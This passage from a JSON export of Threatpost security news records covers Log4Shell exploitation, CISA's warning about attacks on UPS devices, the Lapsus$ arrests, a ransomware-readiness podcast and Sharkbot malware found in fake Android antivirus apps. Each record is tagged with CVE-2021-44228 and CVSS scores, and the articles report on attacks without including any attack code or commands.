"THREATPOST:065F7608AC06475E765018E97F14998D", "href": "https://threatpost.com/riot-games-job-fraud/176950/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T04:10:46", "description": "Call it a \u201clogjam\u201d of threats: Attackers including nation-state actors have already targeted half of all corporate global networks in security companies\u2019 telemetry using at least 70 distinct malware families \u2014 and the fallout from the Log4j vulnerability is just beginning.\n\nResearchers manning keyboards all over the world have spent the past several days chasing [attacks aimed at a now-infamous Log4j](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>) Java library bug, dubbed [Log4Shell (CVE-2021-44228).](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) Side note: Log4j is pronounced, \u201clog forge\u201d \u2014 although that\u2019s disputed, because it\u2019s also referred to in conversation as \u201clog-four-jay.\u201d Dealer\u2019s choice there.\n\nFirst discovered among Minecraft players last week, the newly discovered vulnerability has opened a massive opportunity for threat actors to hijack servers, mostly with coin miners and botnets, but also a cornucopia of other malware such as the [StealthLoader trojan](<https://blog.checkpoint.com/2021/12/14/a-deep-dive-into-a-real-life-log4j-exploitation/>) \u2014 and that\u2019s just so far.\n\n\u201cWe\u2019ve seen a lot of chatter on Dark Web forums, including sharing scanners, bypasses and exploits,\u201d Erick Galinkin, an artificial intelligence researcher at Rapid7, told Threatpost. \u201cAt this point, more than 70 distinct malware families have been identified by us and other security researchers.\u201d\n\nFor instance, Bitdefender researchers this week [discovered](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>) that threat actors are attempting to exploit Log4Shell to deliver a new ransomware called Khonsari to Windows machines.\n\nCheck Point research reported Wednesday that since last Friday, its team has detected 1.8 million Log4j [exploit attempts](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>) on almost half of all corporate networks that they track.\n\nThese threat actors aren\u2019t low-skilled hobbyists. Check Point added that as of Wednesday, Iranian hacking group Charming Kitten, also known as APT 35 and widely believed to be working as a [nation-state actor](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>), is actively targeting seven specific Israeli organizations across the government and business sectors.\n\n\u201cOur reports of the last 48 hours prove that both criminal-hacking groups and nation state actors are engaged in the exploration of this vulnerability, and we should all assume more such actors\u2019 operations are to be revealed in the coming days,\u201d Check Point added.\n\nMicrosoft meanwhile reported that nation-state groups Phosphorus (Iran) and [Hafnium](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) (China), as well as unnamed APTs from North Korea and Turkey are actively exploiting Log4Shell (CVE-2021-44228) in targeted attacks. Hafnium is known for targeting Exchange servers with the ProxyLogon zero-days back in March, while Phosphorus [made headlines](<https://threatpost.com/microsoft-iranian-apt-t20-summit-munich-security-conference/160654/>) for targeting global summits and conferences in 2020.\n\n\u201cThis activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment and exploitation against targets to achieve the actor\u2019s objectives,\u201d the company said in [a posting](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>).\n\n## **Is a Log4j Worm Next? **\n\nResearcher Greg Linares meanwhile has reported seeing evidence that a self-propagating worm is being developed and will likely emerge in a day or less.\n\n> [#Log4J](<https://twitter.com/hashtag/Log4J?src=hash&ref_src=twsrc%5Etfw>) based on what I've seen, there is evidence that a worm will be developed for this in the next 24 to 48 hours.\n> \n> Self propagating with the ability to stand up a self hosted server on compromised endpoints.\n> \n> In addition to spraying traffic, dropping files, it will have c2c\n> \n> \u2014 Greg Linares (@Laughing_Mantis) [December 12, 2021](<https://twitter.com/Laughing_Mantis/status/1470165580736987137?ref_src=twsrc%5Etfw>)\n\nThere is wide agreement within the cybersecurity community that he\u2019s correct, but many experts don\u2019t think the fallout will be as bad with Log4j as it was with past incidents like [WannaCry or NotPetya](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>).\n\n\u201cWhile it\u2019s possible that we could see a worm developed to spread among susceptible Log4j devices, there hasn\u2019t been any evidence to suggest this is a priority for threat actors at this time,\u201d Chris Morgan, senior cyber threat intelligence analyst at Digital Shadows, told Threatpost. \u201cDeveloping malware of this nature takes a significant amount of time and effort.\u201d\n\n\u201cThis activity differs from the WannaCry incident, which saw a perfect storm of a highly exploitable vulnerability coinciding with an NSA-level exploit breach in EternalBlue,\u201d Morgan added.\n\n\u201cIt\u2019s still very much early days with regards to Log4j,\u201d Morgan said. \u201cWhile many threat actors will likely be at different stages of the kill chain, most actors will likely still be scanning for susceptible systems, attempting to establish a foothold, and identifying further opportunities, depending on their motivations. Efforts among actors at this stage are rushing to exploit before companies have a chance to patch, rather than spending time developing a worm.\u201d\n\nThe emergence of a Log4j worm isn\u2019t the worst-case scenario, researchers like Yaniv Balmas from Salt Security explained to Threatpost.\n\n\u201cWhile not neglecting the impact of such a worm, that might not be the worst scenario because of the unbelievable easiness that this attack can be applied,\u201d Balmas said. \u201cEveryone with a basic computer and internet access could launch an attack against millions of online services within minutes. This achieves quite a similar impact as a worm \u2013 it is distributed and unpredictable, and the damage extent might even be higher than a worm since a worm works \u2018blindly\u2019 in an automated manner.\u201d\n\nHe added, \u201cin this other scenario, there are actual humans behind the attacks which may target specific entities or institutions and enable attackers to fine-tune their attacks as they progress.\u201d\n\nThe tireless work being done by security teams to [patch up Log4j against exploits](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) is a big help against the development of any worms on the horizon, John Bambenek, principal threat hunter at Netenrich, told Threatpost.\n\n\u201cThis vulnerability certainly looks wormable, however, the good news is we\u2019ve already had almost a week to start dealing with detection, mitigation [and patching](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>),\u201dBambenek said. \u201cThere will be lots of vulnerable machines out there, but by now a good deal of the vulnerable machines have been handled and many more are protected with web application firewall (WAF) rules (for instance, Cloudflare deployed protection over the weekend). The worst case would have been a worm last week, we\u2019re in a better place now.\u201d\n\n## **Log4j\u2019s Long Tail **\n\nBeyond emergency patching measures, Galinkin explained to Threatpost that his concern is with lingering unpatched devices and systems that will be vulnerable long after Log4j has fallen out of the headlines, particularly in sectors like academia and healthcare.\n\n\u201cOne crucial thing to note about this vulnerability is that it\u2019s going to have an extremely long tail,\u201d he said. \u201cHospitals tend to purchase software once, but sometimes the vendors become defunct \u2014 leading to unsupported software that will never receive a patch.\u201d\n\nHe added, \u201cin academia, loads of software is written once by grad students or professors, but those individuals may not be aware of the bug, or they simply no longer maintain the software \u2014 software that is in use in physics, pharmacology and bioinformatics. This suggests that we will continue to see exploitation of this vulnerability \u2014 potentially in isolated incidents \u2014 long into the future.\u201d\n\n121621 16:21 UPDATE: Corrected spelling of John Bambenek\u2019s name.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T23:18:44", "type": "threatpost", "title": "Relentless Log4j Attacks Include State Actors, Possible Worm", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-15T23:18:44", "id": "THREATPOST:5CCE0C2607242B16B2880B331167526C", "href": "https://threatpost.com/log4j-attacks-state-actors-worm/177088/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T17:33:05", "description": "Cyberattackers are targeting uninterruptible power supply (UPS) devices, which provide battery backup power during power surges and outages. UPS devices are usually used in mission-critical environments, safeguarding critical infrastructure installations and important computer systems and IT equipment, so the stakes are high.\n\nThat\u2019s according to the Cybersecurity and Infrastructure Security Agency (CISA) and the Department of Energy, which warned that malicious types are going after internet-connected versions of UPS via default usernames and passwords, mostly \u2013 though vulnerabilities, like the [TLStorm bugs disclosed earlier this month](<https://threatpost.com/zero-click-flaws-ups-critical-infratructure/178810/>) \u2013 are also in the attacker toolbox.\n\n\u201cIn recent years, UPS vendors have added an Internet of Things [IoT] capability, and UPSs are routinely attached to networks for power monitoring, routine maintenance and/or convenience,\u201d according to a [Tuesday alert](<https://www.cisa.gov/sites/default/files/publications/CISA-DOE_Insights-Mitigating_Vulnerabilities_Affecting_Uninterruptible_Power_Supply_Devices_Mar_29.pdf>) from CISA (PDF). \u201cLoads for UPSs can range from small (e.g., a few servers) to large (e.g., a building) to massive (e.g., a data center).\u201d\n\nIf attackers are able to remotely take over the devices, they can be used for a host of nefarious ends. For instance, bad actors can use them as a jumping-off point to breach a company\u2019s internal network and steal data. Or, in a grimmer scenario, they could be used to cut power for mission-critical appliances, equipment or services, which could cause physical injury in an industrial environment, or disrupt business services, leading to significant financial losses.\n\nFurther, cyberattackers could also execute remote code to alter the operation of the UPSs themselves, or physically damage them (or the devices connected to them).\n\n\u201cIt\u2019s easy to forget that every device connected to the internet is at increased risk of attack,\u201d Tim Erlin, vice president of strategy at Tripwire, noted via email. \u201cJust because a vendor provides the capability to put a device on the internet, doesn\u2019t mean that it\u2019s set up to be secure. It\u2019s up to each organization to ensure that the systems they deploy are configured securely.\u201d\n\n## **An Easy Fix**\n\nThus, those responsible for UPS upkeep (which CISA noted could include IT staff, building operations people, industrial maintenance workers or third-party contractors from monitoring services) have an easy fix for this one: Enumerating all connected UPSs and similar systems and simply take them offline.\n\nIf maintaining an active IoT connection is a requirement, admins should change the default credentials to a strong user-name-and-password combo \u2013 and preferably, implement multifactor authentication (MFA) too, CISA added. And other mitigations, according to CISA, include ensuring UPSs are behind a virtual private network (VPN), and adopting login timeout/lockout features so that the devices aren\u2019t continually online and open to the world.\n\n\u201cThe use of a default username and password to maliciously access a system isn\u2019t a new technique,\u201d said Erlin. \u201cIf you\u2019re responding to this advisory by updating the credentials for your UPS systems, take the follow-up step to ensure that other systems aren\u2019t using default credentials as well.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T17:14:57", "type": "threatpost", "title": "Cyberattackers Target UPS Back-Up Power Devices in Mission-Critical Environments", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-30T17:14:57", "id": "THREATPOST:16877B149E701CC4DB69E91C567D79CC", "href": "https://threatpost.com/cyberattackers-ups-backup-power-critical-environments/179169/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T21:25:13", "description": "City of London Police have arrested seven people suspected of being connected to the Lapsus$ gang.\n\nThe bust came within hours of Bloomberg having published a [report](<https://www.bloomberg.com/news/articles/2022-03-23/teen-suspected-by-cyber-researchers-of-being-lapsus-mastermind?sref=ylv224K8>) about a teenage boy living at his mother\u2019s house near Oxford, England who\u2019s suspected of being the Lapsus$ mastermind.\n\nThe police haven\u2019t verified whether or not they nabbed the Oxford teen, per se.\n\nAt any rate, given that he\u2019s a minor, it would be illegal to identify him: According to security journalist [Brian Krebs](<https://krebsonsecurity.com/2022/03/a-closer-look-at-the-lapsus-data-extortion-group/>), the teen is 17, though the [BBC](<https://www.bbc.com/news/technology-60864283>) pegs his age at 16.\n\nBut for what it\u2019s worth, all of the suspects are young. In a statement given to [TechCrunch](<https://techcrunch.com/2022/03/24/london-police-lapsus-arrests/>), the City of London Police said the seven are between 16 and 21: \u201cThe City of London Police has been conducting an investigation with its partners into members of a hacking group,\u201d according to Detective Inspector Michael O\u2019Sullivan. \u201cSeven people between the ages of 16 and 21 have been arrested in connection with this investigation and have all been released under investigation. Our enquiries remain ongoing.\u201d\n\nInvestigators reportedly told Bloomberg that another member of Lapsus$ is suspected to be a teenager residing in Brazil. There could well be more: Another investigator told the outlet that security researchers have identified seven unique accounts associated with Lapsus$, \u201cindicating that there are likely others involved in the group\u2019s operations.\u201d\n\n## Busy Beavers\n\nOver the past few months, Lapsus$ \u2013 a data extortion group \u2013 has targeted [Brazil\u2019s Ministry of Health](<https://www.zdnet.com/article/brazilian-ministry-of-health-suffers-cyberattack-and-covid-19-vaccination-data-vanishes/>) and the gaming giant [Ubisoft](<https://www.toolbox.com/it-security/security-general/news/lapsus-ubisoft-security-incident/>), [crippled](<https://threatpost.com/portuguese-media-giant-impresa-ransomware/177323/>) the Portuguese media kingpin Impresa, and, in recent weeks, eviscerated tech giants including [Samsung](<https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/>), [Nvidia](<https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/>), [Microsoft](<https://threatpost.com/microsoft-lapsus-compromised-one-employees-account/179048/>) and [Okta](<https://threatpost.com/lapsus-data-kidnappers-claim-snatches-from-microsoft-okta/179041/>).\n\nAllison Nixon**,** chief research officer at [Unit 221B](<https://www.unit221b.com/>), is one of the researchers who\u2019ve been tracking the Oxford teen, who, researchers say, goes by the online aliases \u201cWhite,\u201d \u201cBreachbase\u201d or \u201cOklaqq,\u201d among other names\n\nShe\u2019s been working with researchers at security firm Palo Alto Networks to track individual members of LAPSUS$ even prior to the group\u2019s formation. Nixon told KrebsOnSecurity that she\u2019s convinced that the White/OklAGG individual is the head honcho, given that, among other things, theidentity has been tied to the Lapsus$ group\u2019s recruiting message for company insiders to help them penetrate targeted organizations.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/23105813/lapsus-recruitment-ad-e1648047507406.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/23105813/lapsus-recruitment-ad-e1648047507406.png>)\n\nThe Lapsus$ gang\u2019s recruitment ad for rogue employees.\n\nNixon told the BBC that researchers have had the Oxford teen\u2019s name since the middle of last year and that they\u2019d identified him even before he was doxed by a hacking forum \u2013 Doxbin, a site where people can post or sift through the personal data of hundreds of thousands of people for the purpose of doxing \u2013that he\u2019d allegedly purchased and then run as a lousy, much-complained-about admin.\n\nHe wound up selling the forum back to its previous owner, at a loss, then leaked the entire Doxbin dataset, leading to the Doxbin community turning around and doxing him right back. That included what Krebs reported as \u201cvideos supposedly shot at night outside his home in the United Kingdom,\u201d along with his name, address, and social media pictures.\n\nThe Doxbin community also posted a curriculum vitae of his hacking career, the BBC reported \u2013 a career that made him filthy rich in short order. His Doxbin entry connected him to Lapsus$, as well. The entry reportedly reads:\n\n> \u201c[He] slowly began making money to further expand his exploit collection. \u2026 After a few years his net worth accumulated to well over 300BTC (close to $14 mil). \u2026 [He] now is affiliated with a wannabe ransomware group known as \u2018Lapsus$\u2019, who has been extorting & \u2018hacking\u2019 several organisations.\u201d \u2014Doxbin entry, per the BBC\n\nNixon told the BBC that Unit 221B, working with Palo Alto, identified the threat actor and then watched his exploits throughout 2021, \u201cperiodically sending law enforcement a heads-up about the latest crimes.\u201d\n\nShe said that researchers tracked him by \u201cwatching the post history of an account and seeing older posts provide contact information for the guy.\u201d The \u201cWhite\u201d individual also helped, she said, by failing to cover his tracks.\n\n## Get Off My Code, You Damn Kids\n\nAfter its breaches, Lapsus$ has posted stolen source code on the group\u2019s Telegram channel, including code stolen from Microsoft\u2019s Azure DevOps server for the company\u2019s Bing and Cortana products. Lapsus$ has also posted screenshots of Okta\u2019s Slack channels and the interface for Cloudflare, which is one of thousands of customers that use Okta\u2019s technology to provide authentication for its employees.\n\nIn February, the group also [stole](<https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/>) two of Nvidia\u2019s code-signing certificates \u2013 certificates that were then used to sign malware, enabling malicious programs to slide past security safeguards on Windows machines.\n\nAfter its headline-grabbing attacks on Microsoft and Okta this past weekend, Lapsus$ announced on Tuesday that it was going to take a bit of a breather.\n\n\u201cA few of our members has a vacation until 30/3/2022. We might be quiet for some times,\u201d the hackers wrote in the group\u2019s Telegram channel. \u201cThanks for understand us. \u2013 we will try to leak stuff ASAP.\u201d\n\n## Why\u2019d You Do It?\n\nKen Westin, director of security strategy at Cybereason, said it\u2019s tough to guess at the motivation of the purported \u201cmastermind\u201d teen. \u201cMany had speculated it was an organized cybercrime syndicate or potential nation state actors,\u201d he told Threatpost in an email on Thursday.\n\nWhatever the teen\u2019s motivation \u2013 he\u2019s described as having autism, for whatever that\u2019s worth \u2013 Westin thinks the security community underestimates the younger generation. \u201cWe forget teens today have not only grown up with computers, but also have access to an unprecedented number of educational resources on programming and offensive security,\u201d he said.\n\n\u201cI speculated the group was young based on their modus operandi, or lack thereof, it was as if they were surprised by their success and were not sure what to do with it. In some of their follow up communications their language appeared more interested in the notoriety and [was] defensive of their capabilities and accomplishments than any financial motivation,\u201d he continued.\n\nOf course, when it comes to guessing what somebody\u2019s motivation might be for taking on the world\u2019s shiniest tech companies, et al., there\u2019s always that purported 300BTC income that Doxbin pointed to. Not too shabby a motivation, that, particularly when planted in the still-developing brain of a tot that\u2019s been put under glass during the pandemic.\n\n\u201cToday, teens have seen how much money is being made in criminal hacking, in some ways they are the new rockstars,\u201d Westin said. \u201cYou pair this with the fact kids have been couped up for three years often with nothing but the internet to entertain themselves and we shouldn\u2019t be surprised we have skilled hackers. The problem is that their brains are still developing and the line between fun and crime can get blurred, where it\u2019s common for kids to hack to gain notoriety amongst their peers, but this easily crosses over into decisions that can affect the rest of their lives.\u201d\n\nIt\u2019s too early to say whether this will be the end of Lapsus$, he said. \u201cit could still be a false flag, bad attribution, or even framing someone for the hacks. If it is this 16-year-old in England, it is likely we will see an end to the group\u2019s activity, unless one of their partners in cybercrime takes up the mantle.\u201d\n\nWhether Lapsus$ boils down to a criminal gang or a teenager from Oxford, what matters is that the \u201corganization\u201d clearly has the ability to infiltrate some of the world\u2019s largest organizations at a speed that makes these attacks impossible to prevent using traditional perimeter defense tools, said Darren Williams, founder and CEO of privacy/security/prevention firm BlackFog.\n\nWe can\u2019t stick all teenagers in suspended animation until their brains are fully formed, but we can take note of how these groups/individuals stick it to targeted organizations. In an email to Threatpost on Thursday, Williams noted that more than 84 percent of all attacks involve data exfiltration, exposing data on the Dark Web and/or public web sites.\n\n\u201cBy refocusing security efforts on anti-data exfiltration, organizations are able to mitigate extortion attempts, regulatory fines, reports and ultimately the loss of trust in the business,\u201d Williams suggested.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T21:23:30", "type": "threatpost", "title": "UK Cops Collar 7 Suspected Lapsus$ Gang Members", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T21:23:30", "id": "THREATPOST:8105FA1422BB4E02CD95C23CC7405E26", "href": "https://threatpost.com/uk-cops-collar-7-suspected-lapsus-gang-members/179098/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-10T14:12:32", "description": "You hate to blame the victim, but the fact of the matter is that businesses are just asking to get whacked with ransomware multiple times.\n\nA recent [study](<https://www.extrahop.com/company/press-releases/2022/cyber-confidence-index-2022/>) of IT leaders from cloud-native network detection and response firm ExtraHop shows that businesses aren\u2019t even aware of the \u201cattack me,\u201d \u201ceasy prey\u201d pheromones they\u2019re giving off: In fact, there\u2019s a yawning chasm between perception and reality.\n\nThe study shows that corporate leaders have a false sense of security when it comes to their organizations\u2019 IT security readiness. Their confidence is disconnected from their admittance that their cybersecurity incidents are a result of their own outdated IT security plans, including widespread use of insecure and deprecated protocols, as well as growing numbers of unmanaged devices.\n\n![specops logo](https://media.threatpost.com/wp-content/uploads/sites/103/2020/06/16111526/Specops-Logo.png)\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nThe reality: 69 percent of respondents acknowledged transmitting sensitive data over unencrypted HTTP connections instead of more secure HTTPS connections. Another 68 percent are still running SMBv1, the protocol exploited in major/ancient/still-exploited attacks like [WannaCry](<https://threatpost.com/wannacry-gandcrab-top-ransomware-scene/178589/>) and [NotPetya](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>), leading to more than $1 billion in damages worldwide.\n\nDenial ain\u2019t just a river in Egypt. The delusion is particularly dangerous, given the sky-high rate of ransomware attacks. In ExtraHop\u2019s Cyber Confidence Index 2022 \u2013 which surveyed 500 security and IT decision makers in the United States, United Kingdom, France and Germany \u2013 85 percent reported having suffered at least one ransomware attack, and 74 percent reported experiencing multiple incidents in the past five years.\n\n * A jarring majority have experienced a ransomware attack, with some being hit twice. What\u2019s more, the data shows that if a business is hit once, it\u2019s more likely to be hit again.\n * A number of IT decision makers haven\u2019t faced an attack \u2013 and so they \u201caren\u2019t concerned.\u201d\n * 77 percent of IT decision makers are very or extremely confident in their company\u2019s ability to prevent or mitigate cybersecurity threats. And yet \u2026\n * 64 percent admit that half or more of their cybersecurity incidents are the result of their own outdated IT security postures.\n * 85 percent reported having suffered at least one ransomware attack in the past five years, and 74 percent have experienced multiple attacks.\n * 48 percent of companies that suffered a ransomware attack said they paid the ransom demanded most or all of the time.\n\nJamie Moles, ExtraHop senior technical manager, dropped by the Threatpost podcast to talk about perceptions vs. reality.\n\nWannaCry, which hit a few years ago, is a prime example, he told us. The advice back then (and now) was that organizations should check their backups to make sure they\u2019re usable. Innumerable articles and blogs interrogated admins, asking, Have you actually restored a backup recently to make sure that your restores work? Are they up to date?\n\n\u201cA lot of people, we\u2019re finding, actually, that their backup procedures were good, but maybe the technology wasn\u2019t up to date or they were too reliant on things like [volume shadow copies](<https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service>) on workstations,\u201d Jamie told us. \u201cA restore when data was corrupted, not realizing that ransomware gangs turn off volume shadow copies on workstations.\n\n\u201cSo you can\u2019t restore from that. And a lot of organizations found that maybe their backups weren\u2019t fully up to date and they had to go too far back in time to restore, to get themselves operationally back to date. And this has an obvious impact in terms of operating. Resilience has a cost factor associated with it, and getting yourself back to where you were yesterday.\u201d\n\nSo\u2026not to imply anything, but hey, we just thought we\u2019d ask: Have you checked your backups lately to make sure they work?\n\nIf not, maybe go do that. We\u2019ll wait. This podcast doesn\u2019t have an expiration date.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/030722_ExtraHop_Jamie_Moles_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n![](https://slack-imgs.com/?c=1&o1=ro&url=https%3A%2F%2Fmedia.threatpost.com%2Fwp-content%2Fuploads%2Fsites%2F103%2F2022%2F02%2F25090838%2FLog4J.jpg)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T14:00:32", "type": "threatpost", "title": "Multi-Ransomwared Victims Have It Coming\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T14:00:32", "id": "THREATPOST:02A472487653A461080415A3F7BB23D2", "href": "https://threatpost.com/blaming-ransomware-victims-podcast/178799/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-08T16:20:58", "description": "Researchers have found the info-stealing Android malware Sharkbot lurking unsuspected in the depths of the Google Play store under the cover of anti-virus (AV) solutions.\n\nWhile analyzing suspicious applications on the store, the Check Point Research (CPR) team found what purported to be genuine AV solutions downloading and installing the malware, which steals credentials and banking info from Android devices but also has a range of other unique features.\n\n\u201cSharkbot lures victims to enter their credentials in windows that mimic benign credential input forms,\u201d CPR researchers Alex Shamsur and Raman Ladutska wrote in a [report](<https://research.checkpoint.com/2022/google-is-on-guard-sharks-shall-not-pass/>) published Thursday. \u201cWhen the user enters credentials in these windows, the compromised data is sent to a malicious server.\u201d\n\nResearchers discovered six different applications\u2014including ones named Atom Clean-Booster, Antivirus; Antvirus Super Cleaner; and Center Security-Antivirus\u2014spreading Sharkbot. The apps came from three developer accounts\u2013Zbynek Adamcik, Adelmio Pagnotto and Bingo Like Inc.\u2014at least two of which were active in the autumn of last year. The timeline makes sense, as Sharkbot [first came onto researchers\u2019](<https://blog.malwarebytes.com/trojans/2021/11/sharkbot-android-banking-trojan-cleans-users-out/>) radar screens in November.\n\n\u201cSome of the applications linked to these accounts were removed from Google Play, but still exist in unofficial markets,\u201d researchers wrote. \u201cThis could mean that the actor behind the applications is trying to stay under the radar while still involved in malicious activity.\u201d\n\nGoogle removed the offending applications, but not before they were downloaded and installed about 15,000 times, researchers said. Primary targets of Sharkbot are users in the United Kingdom and Italy, as was previously the case, they said.\n\n## **Unique Aspects**\n\nCPR researchers peered under the hood of Sharkbot and uncovered not only typical info-stealing tactics, but also some characteristics that set it apart from typical Android malware, researchers said. It includes a geofencing feature that selects users based on geographic areas, ignoring users from China, India, Romania, Russia, Ukraine or Belarus, they said.\n\nSharkbot also boasts some clever techniques, researchers noted. \u201cIf the malware detects it is running in a sandbox, it stops the execution and quits,\u201d they wrote.\n\nAnother unique hallmark of the malware is that it makes use of Domain Generation Algorithm (DGA), an aspect rarely used in malware for the Android platform, researchers 